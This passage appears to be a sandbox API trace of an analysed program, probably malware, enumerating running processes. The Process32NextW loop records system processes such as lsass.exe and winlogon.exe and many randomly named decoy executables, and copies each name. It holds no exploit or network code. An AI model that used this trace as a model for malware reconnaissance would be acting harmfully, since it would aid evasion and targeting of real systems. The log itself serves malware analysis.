th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0117.031] GetCurrentProcessId () returned 0xde0 [0117.031] GetProcessHeap () returned 0x500000 [0117.031] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x23e1c30 [0117.031] lstrcpyW (in: lpString1=0x23e1c38, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0117.031] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0117.032] GetCurrentProcessId () returned 0xde0 [0117.032] GetProcessHeap () returned 0x500000 [0117.032] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x56de40 [0117.032] lstrcpyW (in: lpString1=0x56de48, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0117.032] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0117.033] GetCurrentProcessId () returned 0xde0 [0117.034] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0117.035] GetCurrentProcessId () returned 0xde0 [0117.035] GetProcessHeap () returned 0x500000 [0117.035] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x24b8030 [0117.035] lstrcpyW (in: lpString1=0x24b8038, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0117.035] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0117.036] GetCurrentProcessId () returned 0xde0 [0117.036] GetProcessHeap () returned 0x500000 [0117.036] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x2399ea0 [0117.036] lstrcpyW (in: lpString1=0x2399ea8, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0117.036] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0117.037] GetCurrentProcessId () returned 0xde0 [0117.038] GetProcessHeap () returned 0x500000 [0117.038] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x2508e70 [0117.038] lstrcpyW (in: lpString1=0x2508e78, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0117.038] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.073] GetCurrentProcessId () returned 0xde0 [0117.073] GetProcessHeap () returned 0x500000 [0117.073] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x25090b0 [0117.073] lstrcpyW (in: lpString1=0x25090b8, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0117.073] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.075] GetCurrentProcessId () returned 0xde0 [0117.075] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1f8, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0117.083] GetCurrentProcessId () returned 0xde0 [0117.083] GetProcessHeap () returned 0x500000 [0117.083] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x591870 [0117.083] lstrcpyW (in: lpString1=0x591878, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0117.084] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x354, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x57, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.084] GetCurrentProcessId () returned 0xde0 [0117.085] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.086] GetCurrentProcessId () returned 0xde0 [0117.086] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.087] GetCurrentProcessId () returned 0xde0 [0117.087] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.088] GetCurrentProcessId () returned 0xde0 [0117.088] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.089] GetCurrentProcessId () returned 0xde0 [0117.089] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.090] GetCurrentProcessId () returned 0xde0 [0117.090] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x478, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.090] GetCurrentProcessId () returned 0xde0 [0117.090] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0117.091] GetCurrentProcessId () returned 0xde0 [0117.091] GetProcessHeap () returned 0x500000 [0117.091] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x549e40 [0117.092] lstrcpyW (in: lpString1=0x549e48, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0117.092] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x354, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0117.092] GetCurrentProcessId () returned 0xde0 [0117.093] GetProcessHeap () returned 0x500000 [0117.093] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x54c280 [0117.093] lstrcpyW (in: lpString1=0x54c288, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0117.093] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x5cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.094] GetCurrentProcessId () returned 0xde0 [0117.094] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x600, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x270, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0117.094] GetCurrentProcessId () returned 0xde0 [0117.094] GetProcessHeap () returned 0x500000 [0117.095] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x54d000 [0117.095] lstrcpyW (in: lpString1=0x54d008, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0117.095] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.096] GetCurrentProcessId () returned 0xde0 [0117.096] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x7c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x354, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0117.097] GetCurrentProcessId () returned 0xde0 [0117.097] GetProcessHeap () returned 0x500000 [0117.097] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x54b980 [0117.097] lstrcpyW (in: lpString1=0x54b988, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0117.097] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x7e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0117.098] GetCurrentProcessId () returned 0xde0 [0117.098] GetProcessHeap () returned 0x500000 [0117.098] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x54bbc0 [0117.098] lstrcpyW (in: lpString1=0x54bbc8, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0117.098] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x8c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x270, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0117.099] GetCurrentProcessId () returned 0xde0 [0117.099] GetProcessHeap () returned 0x500000 [0117.099] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x54be00 [0117.099] lstrcpyW (in: lpString1=0x54be08, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0117.099] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x930, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x270, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0117.100] GetCurrentProcessId () returned 0xde0 [0117.100] GetProcessHeap () returned 0x500000 [0117.100] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x54c040 [0117.100] lstrcpyW (in: lpString1=0x54c048, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0117.100] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x354, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0117.101] GetCurrentProcessId () returned 0xde0 [0117.101] GetProcessHeap () returned 0x500000 [0117.101] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x54c940 [0117.101] lstrcpyW (in: lpString1=0x54c948, lpString2="WMIADAP.exe" | out: lpString1="WMIADAP.exe") returned="WMIADAP.exe" [0117.101] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0117.102] GetCurrentProcessId () returned 0xde0 [0117.102] GetProcessHeap () returned 0x500000 [0117.102] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x54cb80 [0117.102] lstrcpyW (in: lpString1=0x54cb88, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0117.102] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.103] GetCurrentProcessId () returned 0xde0 [0117.103] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x270, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0117.104] GetCurrentProcessId () returned 0xde0 [0117.104] GetProcessHeap () returned 0x500000 [0117.104] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x54c4c0 [0117.104] lstrcpyW (in: lpString1=0x54c4c8, lpString2="backgroundTaskHost.exe" | out: lpString1="backgroundTaskHost.exe") returned="backgroundTaskHost.exe" [0117.104] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x270, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0117.105] GetCurrentProcessId () returned 0xde0 [0117.105] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x2a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x270, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0117.106] GetCurrentProcessId () returned 0xde0 [0117.106] GetProcessHeap () returned 0x500000 [0117.106] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x54c700 [0117.106] lstrcpyW (in: lpString1=0x54c708, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0117.106] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x66c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0117.107] GetCurrentProcessId () returned 0xde0 [0117.107] GetProcessHeap () returned 0x500000 [0117.107] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x54cdc0 [0117.107] lstrcpyW (in: lpString1=0x54cdc8, lpString2="iexplore.exe" | out: lpString1="iexplore.exe") returned="iexplore.exe" [0117.107] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="employee.exe")) returned 1 [0117.108] GetCurrentProcessId () returned 0xde0 [0117.108] GetProcessHeap () returned 0x500000 [0117.108] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x54d240 [0117.108] lstrcpyW (in: lpString1=0x54d248, lpString2="employee.exe" | out: lpString1="employee.exe") returned="employee.exe" [0117.108] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="structure_indeed.exe")) returned 1 [0117.109] GetCurrentProcessId () returned 0xde0 [0117.109] GetProcessHeap () returned 0x500000 [0117.109] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x54d480 [0117.109] lstrcpyW (in: lpString1=0x54d488, lpString2="structure_indeed.exe" | out: lpString1="structure_indeed.exe") returned="structure_indeed.exe" [0117.109] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="beatdeal.exe")) returned 1 [0117.110] GetCurrentProcessId () returned 0xde0 [0117.110] GetProcessHeap () returned 0x500000 [0117.110] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x54b740 [0117.110] lstrcpyW (in: lpString1=0x54b748, lpString2="beatdeal.exe" | out: lpString1="beatdeal.exe") returned="beatdeal.exe" [0117.110] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="my-technology.exe")) returned 1 [0117.112] GetCurrentProcessId () returned 0xde0 [0117.112] GetProcessHeap () returned 0x500000 [0117.112] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x2461990 [0117.112] lstrcpyW (in: lpString1=0x2461998, lpString2="my-technology.exe" | out: lpString1="my-technology.exe") returned="my-technology.exe" [0117.112] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="away.exe")) returned 1 [0117.113] GetCurrentProcessId () returned 0xde0 [0117.113] GetProcessHeap () returned 0x500000 [0117.113] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x2462050 [0117.113] lstrcpyW (in: lpString1=0x2462058, lpString2="away.exe" | out: lpString1="away.exe") returned="away.exe" [0117.113] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="education process memory.exe")) returned 1 [0117.114] GetCurrentProcessId () returned 0xde0 [0117.114] GetProcessHeap () returned 0x500000 [0117.114] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x2460790 [0117.114] lstrcpyW (in: lpString1=0x2460798, lpString2="education process memory.exe" | out: lpString1="education process memory.exe") returned="education process memory.exe" [0117.114] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="period.exe")) returned 1 [0117.115] GetCurrentProcessId () returned 0xde0 [0117.115] GetProcessHeap () returned 0x500000 [0117.115] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x2461510 [0117.115] lstrcpyW (in: lpString1=0x2461518, lpString2="period.exe" | out: lpString1="period.exe") returned="period.exe" [0117.115] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xdb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="focus_wear.exe")) returned 1 [0117.116] GetCurrentProcessId () returned 0xde0 [0117.116] GetProcessHeap () returned 0x500000 [0117.116] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x2462290 [0117.116] lstrcpyW (in: lpString1=0x2462298, lpString2="focus_wear.exe" | out: lpString1="focus_wear.exe") returned="focus_wear.exe" [0117.116] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious-wonder-win.exe")) returned 1 [0117.203] GetCurrentProcessId () returned 0xde0 [0117.203] GetProcessHeap () returned 0x500000 [0117.203] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x2461750 [0117.203] lstrcpyW (in: lpString1=0x2461758, lpString2="religious-wonder-win.exe" | out: lpString1="religious-wonder-win.exe") returned="religious-wonder-win.exe" [0117.203] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="addressseasonlow.exe")) returned 1 [0117.204] GetCurrentProcessId () returned 0xde0 [0117.204] GetProcessHeap () returned 0x500000 [0117.204] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x2462dd0 [0117.204] lstrcpyW (in: lpString1=0x2462dd8, lpString2="addressseasonlow.exe" | out: lpString1="addressseasonlow.exe") returned="addressseasonlow.exe" [0117.204] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="newspapertrypositive.exe")) returned 1 [0117.205] GetCurrentProcessId () returned 0xde0 [0117.205] GetProcessHeap () returned 0x500000 [0117.205] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x24609d0 [0117.205] lstrcpyW (in: lpString1=0x24609d8, lpString2="newspapertrypositive.exe" | out: lpString1="newspapertrypositive.exe") returned="newspapertrypositive.exe" [0117.205] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xde8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="containhowever.exe")) returned 1 [0117.206] GetCurrentProcessId () returned 0xde0 [0117.206] GetProcessHeap () returned 0x500000 [0117.206] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x24624d0 [0117.206] lstrcpyW (in: lpString1=0x24624d8, lpString2="containhowever.exe" | out: lpString1="containhowever.exe") returned="containhowever.exe" [0117.206] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xdf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="amount-bad.exe")) returned 1 [0117.207] GetCurrentProcessId () returned 0xde0 [0117.207] GetProcessHeap () returned 0x500000 [0117.207] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x2463490 [0117.207] lstrcpyW (in: lpString1=0x2463498, lpString2="amount-bad.exe" | out: lpString1="amount-bad.exe") returned="amount-bad.exe" [0117.207] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xdfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="various.exe")) returned 1 [0117.208] GetCurrentProcessId () returned 0xde0 [0117.208] GetProcessHeap () returned 0x500000 [0117.208] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x2460c10 [0117.208] lstrcpyW (in: lpString1=0x2460c18, lpString2="various.exe" | out: lpString1="various.exe") returned="various.exe" [0117.208] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="military.exe")) returned 1 [0117.208] GetCurrentProcessId () returned 0xde0 [0117.208] GetProcessHeap () returned 0x500000 [0117.208] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x2463910 [0117.208] lstrcpyW (in: lpString1=0x2463918, lpString2="military.exe" | out: lpString1="military.exe") returned="military.exe" [0117.208] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="coach_wait_small.exe")) returned 1 [0117.223] GetCurrentProcessId () returned 0xde0 [0117.223] GetProcessHeap () returned 0x500000 [0117.223] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x2461bd0 [0117.223] lstrcpyW (in: lpString1=0x2461bd8, lpString2="coach_wait_small.exe" | out: lpString1="coach_wait_small.exe") returned="coach_wait_small.exe" [0117.223] Process32NextW (in: hSnapshot=0x61c, lppe=0x2bffac0 | out: lppe=0x2bffac0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, 